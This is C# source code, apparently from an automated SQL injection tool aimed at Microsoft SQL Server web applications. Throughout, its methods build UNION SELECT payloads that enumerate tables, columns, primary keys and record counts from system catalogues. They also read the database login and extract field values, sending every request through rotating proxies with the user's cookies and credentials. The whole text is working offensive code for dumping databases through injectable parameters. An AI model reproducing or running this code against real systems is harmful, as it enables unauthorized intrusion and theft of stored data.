private GlobalDS.Field GetFieldData(long TableID, int FieldID) { GlobalDS.Field retVal = new GlobalDS.Field(); StringBuilder WhereClause = new StringBuilder(); WhereClause.Append("id=").Append(TableID).Append(" and colid > ").Append(FieldID); _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("name + char(58)+convert(char,xtype)", "syscolumns", WhereClause.ToString()); string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent); string PulledData = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin); string[] values = PulledData.Split(':'); retVal.FieldName = values[0]; retVal.DataType = GetSqlDataType(Convert.ToInt64(values[1].Trim())); _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, status)", "sysconstraints", "id=" + TableID + " and colid=" + FieldID); ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent); PulledData = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin); if (PulledData.Length > 0) { PulledData = PulledData.Substring(1, PulledData.Length - 1); retVal.IsPrimary = ((Convert.ToInt32(PulledData.Trim()) & 1) == 1); } return(retVal); }
private GlobalDS.Table RetrieveTable(long PreviousTableID) { GlobalDS.Table retVal = new GlobalDS.Table(); _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, name + char(58) + convert(char, id))", "sysobjects", "xtype=char(85) and id > " + PreviousTableID.ToString()); string ResultPage, ResultText; ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent); ResultText = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin); string[] values = ResultText.Split(':'); retVal.Name = values[0]; retVal.ObjectID = Convert.ToInt64(values[1]); _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, char(58) + convert(char, count(*)))", values[0], null); ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent); ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin); if (ResultText.Length > 0) { ResultText = ResultText.Substring(1, ResultText.Length - 1); retVal.RecordCount = Convert.ToInt64(ResultText.Trim()); } else { retVal.RecordCount = -1; } return(retVal); }
/// <summary> /// Pull the username the database is running as /// </summary> /// <returns>The database username</returns> public string GetDatabaseUsername() { _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(40) + SYSTEM_USER + char(41)", null, null); string ResultPage; ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent); string Username = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin); return(Username.Substring(1, Username.Length - 2)); // remove brackets }
// }}} // {{{ GetFieldData private DictionaryEntry GetFieldData(string TableName, GlobalDS.Field Column, GlobalDS.PrimaryKey pk) { DictionaryEntry retVal = new DictionaryEntry(); retVal.Key = Column.FieldName; retVal.Value = string.Empty; if (Column.FieldName.Equals(pk.Name)) { retVal.Value = pk.Value; return(retVal); } StringBuilder SelectClause = new StringBuilder(); switch (Column.DataType) { case SqlDbType.BigInt: case SqlDbType.SmallInt: case SqlDbType.TinyInt: case SqlDbType.Int: case SqlDbType.Decimal: case SqlDbType.DateTime: case SqlDbType.Money: case SqlDbType.Float: case SqlDbType.Real: case SqlDbType.SmallDateTime: case SqlDbType.SmallMoney: case SqlDbType.Timestamp: case SqlDbType.UniqueIdentifier: //retVal.Value = OpenEndedIntegerSearch(Column.FieldName, TableName, pk); SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)"); break; case SqlDbType.NChar: case SqlDbType.Char: case SqlDbType.NVarChar: case SqlDbType.Text: case SqlDbType.NText: case SqlDbType.VarChar: //retVal.Value = GetFieldDataVarChar(Column.FieldName, TableName, pk); SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)"); break; case SqlDbType.Bit: //retVal.Value = GetBitField(Column.FieldName, TableName, pk); SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)"); break; case SqlDbType.Image: case SqlDbType.Binary: case SqlDbType.VarBinary: // TODO: Figure out how to support this! //retVal.Value = null; break; } _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect(SelectClause.ToString(), TableName, pk.Name + " = " + pk.Value); string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent); string ResultText = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin); retVal.Value = ResultText.Substring(1, ResultText.Length - 2); return(retVal); }